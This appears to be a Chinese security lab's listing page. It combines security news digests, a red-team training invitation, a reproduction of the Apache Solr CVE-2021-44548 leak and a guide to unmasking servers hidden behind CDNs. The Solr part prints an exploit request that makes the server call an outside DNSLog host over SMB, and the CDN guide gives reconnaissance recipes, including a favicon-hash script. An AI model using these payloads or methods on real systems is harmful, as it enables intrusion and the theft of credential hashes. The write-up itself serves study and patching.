网络安全日报 2022年05月23日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、美国CFAA迎来重大修订,白帽黑客或将无责 https://www.freebuf.com/news/333764.html 2、Nikkei 披露了可能影响客户数据的勒索软件攻击 https://www.securityweek.com/nikkei-says-customer-data-likely-impacted-ransomware-attack 3、Lazarus APT 使用 Log4JShell 攻击 VMware 服务器 https://securityaffairs.co/wordpress/131483/apt/lazarus-apt-log4j-vmware-servers.html 4、思科修复了一个被积极利用的 IOS XR 漏洞 https://securityaffairs.co/wordpress/131516/security/cisco-ios-xr-flaw.html 5、Linux XorDdos bot 的活动在过去六个月中增加了 254% https://securityaffairs.co/wordpress/131478/hacking/linux-bornet-xorddos-254-surge.html 6、Conti 勒索软件团伙关闭了其运营 https://securityaffairs.co/wordpress/131464/cyber-crime/conti-ransomware-shut-down.html 7、印度Razorpay公司遭黑客入侵损失约7383万卢比 https://www.thehindu.com/news/national/hacker-steals-73-crore-from-payment-gateway-company-razorpay-in-bengaluru/article65426835.ece 8、Netgear修复锁定管理控制台的错误Orbi固件更新 https://www.bleepingcomputer.com/news/technology/netgear-fixes-bad-orbi-firmware-update-that-locked-admin-console/ 9、WordPress的School Management Pro插件中被发现存在后门 https://thehackernews.com/2022/05/researchers-find-backdoor-in-school.html 10、Swagger-UI库中漏洞可导致DOM XSS攻击 https://portswigger.net/daily-swig/widespread-swagger-ui-library-vulnerability-leads-to-dom-xss-attacks
网络安全日报 2022年05月20日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、研究人员发现针对 GitLab CI 管道的供应链攻击 https://www.securityweek.com/researchers-spot-supply-chain-attack-targeting-gitlab-ci-pipelines 2、Pwn2Own 2022:微软Teams 的漏洞利用获得了45万美元 https://www.securityweek.com/microsoft-teams-exploits-earn-hackers-450000-pwn2own-2022 3、Google 的Java OAuth 客户端库漏洞允许部署恶意负载 https://securityaffairs.co/wordpress/131459/security/google-oauth-client-library-flaw.html 4、一种新型的蓝牙中继攻击可以让攻击者远程解锁智能锁和汽车 https://thehackernews.com/2022/05/new-bluetooth-hack-could-let-attackers.html 5、Jupiter 和 JupiterX Core 插件提权漏洞影响9万多个WordPress站点 https://threatpost.com/vulnerability-wordpress-themes-site-takeover/179672/ 6、连锁药房Dis-Chem遭数据泄露,影响 360 万客户 https://www.infosecurity-magazine.com/news/pharmacy-giant-data-breach/ 7、CISA 分享安全指南以阻止正在进行的 F5 BIG-IP 攻击 https://www.bleepingcomputer.com/news/security/cisa-shares-guidance-to-block-ongoing-f5-big-ip-attacks/ 8、Kingminer 僵尸网络攻击 Microsoft SQL Server https://www.trendmicro.com/en_us/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html 9、近 200 万德州人的个人信息被暴露了近三年 https://www.infosecurity-magazine.com/news/personal-information-two-million/ 10、勒索软件袭击美国医疗保健公司 Omnicell https://www.infosecurity-magazine.com/news/ransomware-healthcare-omnicell/
2022年网络安全高级研修班·第二期 邀请函
为深入贯彻落实我国“十四五”规划和2035年远景目标纲要对网络安全工作的重要部署,把握当前国际国内、教育系统网络安全工作面临的新形势,加强网络安全宣传教育和人才培养,赋能学校打造经验丰富的网安教学师资队伍,全面提升网络安全技能实战教学水平。特针对护网红队技术、漏洞攻击实战等热点需求,举办此次“2022年网络安全高级研修班”。  一、会议组织  指导单位:中国网络空间安全人才教育论坛  主办单位:湖南蚁景科技有限公司  二、会议内容  本次会议主要针对护网红队攻击技能实战实训,内容涵盖红队攻击基础、WEB打点、漏洞攻击实战、红队攻击框架详解、内网渗透实战等。  红队攻击基础:红队攻击基本流程、环境搭建以及信息收集。  红队攻击之WEB打点:常见WEB漏洞利用、WEB漏洞扫描器实战。  红队攻击之漏洞攻击:常见中间件漏洞攻击利用、常见开发框架漏洞攻击利用。  红队攻击框架详解:Metasploit、Cobaltstrike。  红队攻击之内网渗透:内网信息收集、密码凭证获取、内网横向移动。  三、参会对象  全国高校、职业院校计算机相关专业(信息安全、计算机科学与技术、网络安全、信息科学与工程、软件工程、网络工程等)学科带头人、专业骨干教师、实验室人员参加。  四、参会收获   1、系统了解护网红队攻击技能核心知识,与讲师互动交流。  2、掌握红队攻击基础、WEB打点、漏洞攻击利用、红队攻击框架、红队攻击工具使用、内网渗透等实战技能。  3、现场跟随讲师的经典案例示范,进行红队攻击实操演练。  4、获得由中国网络空间安全人才教育论坛颁发的证书。  五、会议安排  1、会议方式:线上+线下同步开展  2、报到时间:2022年7月17日全天  3、会议时间:2022年7月18日-7月22日  4、报到地点:湖南长沙  5、会议地点:湖南长沙  6、会议规模:50人  六、会议报名  1、报名时间:即日起至2022年7月17日  2、报名邮箱:EDU@antvsion.com  3、电话咨询:宋老师 13657413038   4、培训费:  3680元/人(含培训资料,提供录播视频,线下参会人员路费和食宿费用自理,需自带电脑)  5、付款方式:  ◆ 线上汇款:(请务必在备注栏里注明“学校名+参会者姓名”)  公司名称:湖南蚁景科技有限公司  开户行名称:北京银行长沙麓谷支行  开户行账号:2000 0044 8649 0003 6286 388  ◆ 现场缴费:现金、扫码或刷卡(银行卡、公务卡均可)   具体课程内容 扫描下方二维码即可报名:
CVE-2021-44548 Apache Solr 敏感信息泄露漏洞分析及复现
前言  由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。  如果文章中的漏洞出现敏感内容产生了部分影响,请及时联系作者,望谅解。  一、漏洞原理  漏洞简述  Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。  2021年12月18日,Apache发布安全公告,Apache Solr中存在一个信息泄露漏洞(CVE-2021-44548),该漏洞影响了8.11.1之前的所有Apache Solr版本(仅影响Windows平台)。Apache Solr的DataImportHandler中存在一个不正确的输入验证漏洞,可利用Windows UNC路径从Solr主机调用网络上的另一台主机的SMB服务,或导致SMB攻击,从而造成: 敏感数据泄露,如系统用户哈希(NTLM/LM哈希); 在系统配置错误的情况下,SMB中继攻击可能导致用户在SMB共享中被冒充,或导致远程代码执行。  漏洞分析  根据抓包内容中请求URL参数,以及solrconfig.xml中可以看到  漏洞点出于DataImportHandler#handleRequestBody  如果传入的command=show-config并且传入config不为空则有一个openResource操作,且参数可控  看到solr-core-8.11.0.jar!\org\apache\solr\core\SolrResourceLoader.openResource this.getInstancePath()得到的路径为D:\Apache_Solr\solr-8.11.0\server\solr\core1  再执行resolve("conf")变成,D:\Apache_Solr\solr-8.11.0\server\solr\core1\conf  再执行resolve(resource)时,这里的WindowsPathType变成了UNC  resolve逻辑判断WindowsPathType是否为绝对路径或UNC路径,是则直接返回参数  resource以\\开头就能使inConfigDir完全可控,在Files.exists中就会去请求windows的unc路径  二、漏洞复现实战  影响版本  Apache Solr < 8.11.1 (仅Windows)  环境搭建  Solr漏洞环境下载地址:  https://archive.apache.org/dist/lucene/solr/8.11.0/solr-8.11.0.zip  1)打开命令行,进入bin目录下,运行solr.cmd start  2)再另一个命令行面板中执行solr.cmd create_core -c new_core  3)然后在solr-8.11.0\dist目录中添加三个jar包:  4)在solr-8.11.0\server\solr\core1\conf\solrconfig.xml中添加DataImportHandler路由  5)在C:\Users\Administrator\Downloads\solr-8.11.0\server\solr\core1\conf目录下新建data-config.xml文件,内容如下: <dataConfig>  <dataSource type="JdbcDataSource"              driver="com.mysql.jdbc.Driver"              convertType="true"              url="jdbc:mysql://IP:Port/test"              user="XXXX"              password="XXXX"/>  <document>    <entity name="entity" query="SELECT id, title, content, tags FROM test_table" >    </entity>  </document> </dataConfig>  6)重新启动solr  漏洞复现  进入Solr后台,选择core为我们新配置的core。  选择Dataimport,查看Configuration,可以看到我们新配置的data-config的详细信息  我们点击reload并抓包  查看包内容,可以看到请求如下:  URL参数添加参数,构造payload  payload:http://localhost:8983/solr/core1/dataimport?command=show-config&config=&\\xxx\xxx  我们添加&expandMacros=false&config=\hdlr07.dnslog.cn\aaa,发送请求:  在DNSLog上可以看到收到请求  漏洞修复  目前此漏洞已经修复,建议受影响用户升级到Apache Solr 8.11.1。  下载链接:  https://solr.apache.org/downloads.html  缓解措施:  确保只有受信任的客户端才能向Solr的DataImporthandler发出请求  结束语  本文主要介绍了CVE-2021-44548 Apache Solr 敏感信息泄露漏洞的原理分析及复现过程,漏洞主要利用DataImportHandler存在输入验证缺陷,最终利用SMB服务导致敏感信息泄露。
网络安全日报 2022年05月19日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、超过 380,000 台 Kubernetes API 暴露在互联网上 https://www.securityweek.com/over-380000-kubernetes-api-servers-exposed-internet-shadowserver 2、NVIDIA 修复了GPU驱动程序中的代码执行漏洞 https://www.securityweek.com/nvidia-patches-code-execution-vulnerabilities-graphics-driver 3、大规模攻击活动利用Tatsu Builder WordPress 插件漏洞 https://www.securityweek.com/large-scale-attack-targeting-tatsu-builder-wordpress-plugin 4、VMware 解决了多个产品中身份验证绕过漏洞 https://securityaffairs.co/wordpress/131429/security/vmware-critical-auth-bypass-issue.html 5、研究人员披露了"Wizard Spider"网络犯罪组织的运作流程 https://thehackernews.com/2022/05/researchers-expose-inner-working-of.html 6、微软警告针对加密钱包的“Cryware”信息窃取恶意软件 https://thehackernews.com/2022/05/microsoft-warns-of-cryware-info.html 7、新的 SYK Crypter 通过 Discord 传播 https://cyware.com/news/new-syk-crypter-propagates-via-discord-d5115d1e 8、2250 万马来西亚人的数据在暗网以 10,000 美元价格出售 https://www.straitstimes.com/asia/se-asia/data-of-225-million-malaysians-born-1940-2004-allegedly-being-sold-for-us10k 9、研究人员发现UpdateAgent macOS恶意软件新变种 https://www.jamf.com/blog/updateagent-adapts-again/ 10、Conti团伙声称将删除哥斯达黎加政府的解密密钥 https://thehackernews.com/2022/05/russian-conti-ransomware-gang-threatens.html
网络安全日报 2022年05月18日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、公安部公布五类高发电信网络诈骗类型,"刷单"占榜首 http://www.gov.cn/xinwen/2022-05/11/content_5689723.htm 2、Play Store 上的 200 多个应用正在分发 Facestealer信息窃取器 https://securityaffairs.co/wordpress/131370/malware/facestealer-info-stealer-play-store.html 3、卡巴斯基研究发现2022 年 HTML 附件在网络钓鱼攻击中仍然很流行 https://www.bleepingcomputer.com/news/security/html-attachments-remain-popular-among-phishing-actors-in-2022/ 4、委内瑞拉心脏病专家被指控经营和销售Thanos勒索软件 https://securityaffairs.co/wordpress/131382/cyber-crime/venezuelan-man-accused-thanos-ransomware.html 5、链家IT管理员删除公司9TB数据,被判7年有期徒刑 https://www.freebuf.com/news/333221.html 6、英国政府制定了《2022年民用核网络安全战略》 https://www.infosecurity-magazine.com/news/uk-sets-out-nuclear-cybersecurity/ 7、虚假移动应用窃取Facebook凭据和加密货币密钥 https://www.trendmicro.com/en_us/research/22/e/fake-mobile-apps-steal-facebook-credentials--crypto-related-keys.html 8、利用已修复的微软SharePoint漏洞可发起RCE攻击 https://portswigger.net/daily-swig/sharepoint-rce-bug-resurfaces-three-months-after-being-patched-by-microsoft 9、自定义PowerShell RAT以乌克兰信息为诱饵针对德国 https://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/ 10、NSA 表示美国新加密标准没有后门 https://www.solidot.org/story?sid=71525
网络安全日报 2022年05月17日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、研究人员发现新型BLE蓝牙中继攻击 https://www.securityweek.com/researchers-devise-new-type-bluetooth-le-relay-attacks 2、勒索软件团伙威胁要推翻哥斯达黎加政府 https://www.securityweek.com/ransomware-gang-threatens-overthrow-costa-rica-government 3、研究人员发现可以利用低功耗模式在关机的iPhone上运行恶意软件 https://www.securityweek.com/hackers-can-abuse-low-power-mode-run-malware-powered-iphones 4、Apple发布更新修复了自 2022 年初以来的第六个0day漏洞 https://securityaffairs.co/wordpress/131346/security/apple-sixth-zero-day-2022.html 5、Armageddon APT组织发起新的网络钓鱼攻击 https://securityaffairs.co/wordpress/131296/breaking-news/cert-ua-warns-armageddon-apt.html 6、虚假Pixelmon NFT网站分发密码窃取恶意软件 https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/ 7、欧洲宣布采用旨在加强网络安全的新NIS2指令 https://thehackernews.com/2022/05/europe-agrees-to-adopt-new-nis2.html 8、研究人员通过DLL劫持漏洞阻止REvil勒索软件 https://portswigger.net/daily-swig/researcher-stops-revil-ransomware-in-its-tracks-with-dll-hijacking-exploit 9、小伙浏览涉黄APP,5天被骗142万! https://www.anquanke.com/post/id/273098 10、BPFdoor:隐形 Linux 恶意软件绕过防火墙进行远程访问 https://www.bleepingcomputer.com/news/security/bpfdoor-stealthy-linux-malware-bypasses-firewalls-for-remote-access/
网络安全日报 2022年05月16日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Sysrv 僵尸网络新变种Sysrv-K利用Spring和WordPress漏洞 https://securityaffairs.co/wordpress/131290/cyber-crime/microsoft-sysrv-botnet-new-exploits.html 2、SonicWall 敦促客户修复 SMA 1000 产品中的高危漏洞 https://securityaffairs.co/wordpress/131247/security/sonicwall-urges-customers-to-fix-sma-1000-vulnerabilities.html 3、Zyxel 防火墙修复了一个严重RCE漏洞 https://securityaffairs.co/wordpress/131243/hacking/zyxel-critical-flaw.html 4、伊朗黑客利用 BitLocker 和 DiskCryptor 进行勒索软件攻击 https://thehackernews.com/2022/05/iranian-hackers-leveraging-bitlocker.html 5、西门子楼宇自动化控制器存在漏洞可被黑客攻击 https://www.securityweek.com/hackers-can-make-siemens-building-automation-controllers-unavailable-days 6、InHand Networks 工业路由器存在多个高危漏洞 https://www.securityweek.com/critical-vulnerabilities-provide-root-access-inhand-industrial-routers 7、研究人员披露为期数月的针对 14 家德国汽车制造商的恶意软件活动 https://cyware.com/news/malware-campaign-targets-at-least-14-german-automakers-db0e9ea1 8、RedLine Stealer新活动通过YouTube传播 https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload 9、Legion黑客组织对欧洲歌唱大赛官网发起攻击 https://securityaffairs.co/wordpress/131280/hacktivism/legion-collective-call-attack-eurovision.html 10、谷歌发布更新修复Chrome中的高严重性漏洞 https://www.securityweek.com/chrome-101-update-patches-high-severity-vulnerabilities
网络安全日报 2022年05月16日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Sysrv 僵尸网络新变种Sysrv-K利用Spring和WordPress漏洞 https://securityaffairs.co/wordpress/131290/cyber-crime/microsoft-sysrv-botnet-new-exploits.html 2、SonicWall 敦促客户修复 SMA 1000 产品中的高危漏洞 https://securityaffairs.co/wordpress/131247/security/sonicwall-urges-customers-to-fix-sma-1000-vulnerabilities.html 3、Zyxel 防火墙修复了一个严重RCE漏洞 https://securityaffairs.co/wordpress/131243/hacking/zyxel-critical-flaw.html 4、伊朗黑客利用 BitLocker 和 DiskCryptor 进行勒索软件攻击 https://thehackernews.com/2022/05/iranian-hackers-leveraging-bitlocker.html 5、西门子楼宇自动化控制器存在漏洞可被黑客攻击 https://www.securityweek.com/hackers-can-make-siemens-building-automation-controllers-unavailable-days 6、InHand Networks 工业路由器存在多个高危漏洞 https://www.securityweek.com/critical-vulnerabilities-provide-root-access-inhand-industrial-routers 7、研究人员披露为期数月的针对 14 家德国汽车制造商的恶意软件活动 https://cyware.com/news/malware-campaign-targets-at-least-14-german-automakers-db0e9ea1 8、RedLine Stealer新活动通过YouTube传播 https://www.netskope.com/blog/redline-stealer-campaign-using-binance-mystery-box-videos-to-spread-github-hosted-payload 9、Legion黑客组织对欧洲歌唱大赛官网发起攻击 https://securityaffairs.co/wordpress/131280/hacktivism/legion-collective-call-attack-eurovision.html 10、谷歌发布更新修复Chrome中的高严重性漏洞 https://www.securityweek.com/chrome-101-update-patches-high-severity-vulnerabilities
CDN绕过技术总汇
近日HVV培训以及面试,有人问了CDN该如何绕过找到目标真实IP,这向来是个老生常谈的问题,而且网上大多都有,但是有些不够全面,今天把绕过CDN全理一理。术语叫做“深入浅出”。  CDN简介  定义  内容分发网络(英语:Content Delivery Network或Content Distribution Network,缩写:CDN)是指一种透过https://zh.wikipedia.org/wiki/%E4%BA%92%E8%81%AF%E7%B6%B2互相连接的电脑网络系统,利用最靠近每位用户的服务器,更快、更可靠地将音乐、图片、视频、应用程序及其他文件发送给用户,来提供高性能、可扩展性及低成本的网络内容传递给用户。  CDN是利用缓存技术,解决如何将数据快速可靠从源站传递到用户的问题。用户获取数据时,不需要直接从源站获取,通过CDN分发,用户可以从一个较优的服务器获取数据,从而达到快速访问,并减少源站负载压力的目的(负载均衡)  工作过程 用户在浏览器输入域名,先向DNS服务器发送请求 DNS服务器将域名解析权交(通过CNAME)给CDN专用DNS服务器 客户端根据返回的ip访问CDN负载均衡设备 负载均衡设备根据当前的负载情况和用户所需内容,返回合适的ip 客户端最后根据ip访问对应的CDN缓存服务器  优点 缓解原服务器访问压力 解决互联互通难题 解决网站突发流量的问题 合理利用互联网资源 全面预防单点故障 改善用户的访问的质量和体验 提供全面、准确、和详细的数据统计 有效的防治黑客攻击源站 ......  适用范围  一般来说以资讯、内容等为主的网站,具有一定访问体量的网站 静态内容(html、js、css、image等,如图床) 视音频、大文件下载,分发加速:哔哩哔哩、腾讯等视频,百度云盘、蓝奏云等 视频直播加速:斗鱼、淘宝、虎牙直播 移动应用加速:移动app内图片、页面、短视频、UGC等内容,小程序等  像直播这一类必有CDN,因为一个网站直播流涌入大量用户,现在任何一家直播平台都没有直接负载的服务器能力。看直播再快的网速都有一定延迟的原因之一就是,需要在CDN里缓存一部分,用户从CDN里观看。  判断是否存在CDN  方法一:PingPingPing  不同地区对应着不同的CDN中心,所以使用不同站点的ping服务可分配到不同的CDN。这很简单,使用各种多站点ping服务来检查对应的IP地址是否唯一。如果不是唯一的,则使用大多数 CDN。多站Ping网站为:  http://ping.chinaz.com/http://ping.aizhan.com/http://tools.ipip.net/ping.php (强烈推荐这个,这个默认多站ping,真的很多)  方法二:nslookup  使用 nslookup 进行检测,原理同上,如果返回域名解析对应多个 IP 地址多半是使用了 CDN。  有 CDN 的示例: > ctfking.com 服务器:  public1.alidns.com Address:  223.5.5.5 非权威应答: 名称:    d831e3eec87f7d3c02a6-mini-l2.qcloudzygj.com Addresses:  106.55.85.170          106.55.85.167          106.55.86.71 Aliases:  ctfking.com          d14ca549ac628ef817e7beaa5095976f.qcloudwzgj.com  无CDN的示例: > nbufe.edu.cn 服务器:  public1.alidns.com Address:  223.5.5.5 名称:    nbufe.edu.cn  方法三:工具  https://www.cdnplanet.com/tools/cdnfinder/  CDN绕过  方法一:查询DNS解析记录  1.查看IP与域名绑定的历史记录。使用 CDN 之前可能有记录。相关查询网站为:  https://dnsdb.io/zh-cn/  https://x.threatbook.cn/  https://sitereport.netcraft.com/  https://tools.ipip.net/cdn.php(没错又是这个网站,它太猛了)  2.借助Securitytrails平台(https://securitytrails.com/)  攻击者可以查明真实的原始IP。他们只需在搜索字段中输入站点域名并按 ENTER,即可在左侧菜单中找到“历史数据”。  如何找到隐藏在 CloudFlare 或 Tor 背后的真实原始 IP?  除了过去的 DNS 记录,即使是当前的记录也可能泄露原始服务器 IP。例如,MX 记录是查找 IP 的常用方法。如果网站在与 Web 相同的服务器和 IP 上托管自己的邮件服务器,则原始服务器 IP 将在 MX 记录中。  方法二:查询子域名  毕竟CDN还是不便宜,所以很多站长可能只会在主站或者流量大的子站做一个CDN,而很多小站子站跟主站在同一个服务器或者同C段,此时可以通过子域对应的IP查询,帮助找到真实IP站点。 https://x.threatbook.cn/上面提到的微步在线功能强大,黑客只需输入域名即可查找(如baidu.com),点击子域选项即可找到其子域,但免费用户每月只有5次免费查询机会。 https://dnsdb.io/zh-cn/黑客只需要输入baidu.com TYPE:A就可以收集到百度的子域名和IP。 https://www.google.com/谷歌站点:baidu.com-www 可以看到除WWW以外的子域 子域扫描器 Layer子域名挖掘机和lijiejie的subdomain那个工具都很不错 推荐长亭的xray  方法三:网络空间引擎  fofa、鹰图、Zoomeye、shodan、360  推荐鹰图  只需输入:title:“网站的title关键字”或者body:“网站的body特征”就可以找出收录的有这些关键字的ip域名,很多时候能获取网站的真实ip  方法四:使用SSL证书寻找真实原IP  如果您在 xyz123boot.com 上托管服务,则原始服务器 IP 为 136.23.63.44。CloudFlare 将为您提供 DDoS 防护、Web 应用防火墙和其他一些https://www.webshell.cc/tag/security服务,以保护您的服务免受攻击。为此,您的 Web 服务器必须支持 SSL 并具有证书。此时,CloudFlare 与您的服务器之间的通信,就像您与 CloudFlare 之间的通信一样,将被加密(即没有灵活的 SSL)。这看起来很安全,但问题是当你直接连接到443端口(https://136.23.63.44:443)上的IP时,会暴露SSL证  此时,如果攻击者扫描0.0.0.0/0,整个互联网,就可以在xyz123boot.com的443端口获取有效证书,进而获取提供给你的web服务器IP。  目前,Censys 工具可以扫描整个互联网。Censys 是用于搜索联网设备信息的新搜索引擎。安全专家可以使用它来评估其实施的安全性,黑客可以使用它作为初步调查。攻击目标和收集目标信息的强大武器。Censys 搜索引擎可以扫描整个互联网。Censys每天扫描IPv4地址空间,搜索所有联网设备并收集相关信息,并返回资源(如设备、网站、证书等)配置和部署的整体报告。  攻击者唯一需要做的就是将上述搜索词转换为实际的搜索查询参数。  xyz123boot.com证书的搜索查询参数为:parsed.names: xyz123boot.com  只显示有效证书的查询参数为:tags.raw:trusted  攻击者可以在 Censys 上实现多个参数的组合,这可以通过使用简单的布尔逻辑来完成。  组合的搜索参数是:parsed.names:xyz123boot.com 和 tags.raw:trusted  Censys 将向您显示在扫描中找到的符合上述搜索条件的所有标准证书。  要一一查看这些搜索结果,攻击者可以通过单击右侧的“探索”来打开一个包含多个工具的下拉菜单。什么在使用这个证书?> IPv4 主机  使用给定的 SSL 证书  如果您是执法人员,并且想找到隐藏在 cheesecp5vaogohv.onion 下的儿童色情网站。最好的办法是找到它的原始IP,这样就可以追踪它的托管服务器,甚至可以找出它背后的运营商和财务线索。  隐藏服务具有 SSL 证书。要查找它使用的 IPv4 主机,只需将“SHA1 指纹”(签名证书的 sha1 值)粘贴到 Censys IPv4 主机搜索中即可找到证书。这种方法很容易找到配置错误的Web服务器。  方法五:使用HTTP头找到真正的原始IP  借助 SecurityTrails 这样的平台,任何人都可以在海量的大数据中搜索自己的目标,甚至可以通过比较 HTTP 标头找到原始服务器。  特别是当用户有一个非常特殊的服务器名称和软件名称时,攻击者更容易找到你。  如果要搜索的数据很多,如上所述,攻击者可以在 Censys 上组合搜索参数。假设您正在与 1500 个 Web 服务器共享您的服务器 HTTP 标头,所有这些服务器都发送相同的标头参数和值组合。而且您还使用新的 PHP 框架来发送唯一的 HTTP 标头(例如:X-Generated-Via: XYZ 框架),目前约有 400 位网站管理员使用该框架。最终,在三台服务器的交汇处,通过人工操作即可找到IP,整个过程仅需几秒。  例如,Censys上用于匹配服务器头的搜索参数为80.http.get.headers.server:,查找CloudFlare服务的网站的参数如下:  80.http.get.headers.server:cloudflare  方法六:利用网站返回的内容寻找真实的原IP  如果原服务器IP也返回网站内容,可以在网上搜索很多相关资料。  浏览网站源代码以查找独特的代码片段。在 JavaScript 中使用具有访问权限或标识符参数的第三方服务(例如 Google Analytics、reCAPTCHA)是攻击者经常使用的一种方法。  以下是从 HackTheBox 网站获得的 Google Analytics 跟踪代码示例:  ga('创建','UA-93577176-1','auto');80.http.get.body 可以使用:参数通过body/source过滤Censys数据。不幸的是,普通搜索字段有局限性。但是您可以在 Censys 请求研究访问权限,这使您可以通过 Google BigQuery 进行更强大的查询。  Shodan 是一个类似于 Censys 的服务,同样提供 http.html 搜索参数。  搜索示例:https://www.shodan.io/search?query=http.html%3AUA-32023260-1  方法七:使用外地主机解析域名  国内很多CDN厂商因为各种原因只做国内线,国外线路可能几乎没有。这时候我们可能会使用外地主机直接访问真实IP。  方法八:网站漏洞搜索 目标敏感文件泄露,如phpinfo、GitHub信息泄露等探针 XSS盲打、命令执行反向shell、SSRF等 无论是社会工程还是其他手段,目标网站获取CDN中的管理员账号,在CDN的配置中可以找到网站的真实IP。  方法九:网站邮件订阅搜索  RSS邮件订阅,很多网站都有自己的sendmail,会发邮件给我们。此时,服务器的真实IP将包含在邮件的源代码中。  方法十:用Zmap扫描全网  要找到xiaix.me网站的真实IP,我们首先从apnic获取IP段,然后使用Zmap的banner-grab扫描出开放80端口的主机进行banner抓包,最后在Host中写入xiaix.me http请求。  方法十一:F5 LTM解码方法  服务器使用F5 LTM进行负载均衡时,也可以通过set-cookie关键字解码得到真实ip,例如:Set-Cookie: BIGipServerpool_8.29_8030=487098378.24095.0000,第一个小数部分的十进制数是487098378取出来,然后转换成十六进制数1d08880a,然后从后往前,取出四位数字,就是0a.88.08.1d,最后再转换成十进制数10.136.8.29,也是最后一个真实IP。  方法十二:网页敏感信息  这条思路来源于Jacko  favicon哈希值  根据网站图标哈希值搜索IP  python2脚本 import mmh3 import requests response = requests.get('https://example.com/favicon.ico') favicon = response.content.encode('base64') hash = mmh3.hash(favicon) print 'http.favicon.hash:'+str(hash)  去fofa或者shodan上搜索该哈希值  查询格式: fofa:icon_hash="xxx" shodan:http.favicon.hash:xxx  HTML源代码检索查找IP  根据网站页面HTML中特有的字符串去搜索引擎中搜索,如目标页面中由HTML标签为<title>的字段比较特殊,那么可以去FOFA中搜索: title="xxxxxxxxxxxxxxx"  搜索到的结果会显示IP,访问该IP,若能够正常访问则为真正IP,如果打不开则为CDN或虚拟主机服务器  参考文章: https://www.wolai.com/3xXwCoP1KEgkWWG8bnnianhttps://www.codetd.com/en/article/12945130
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页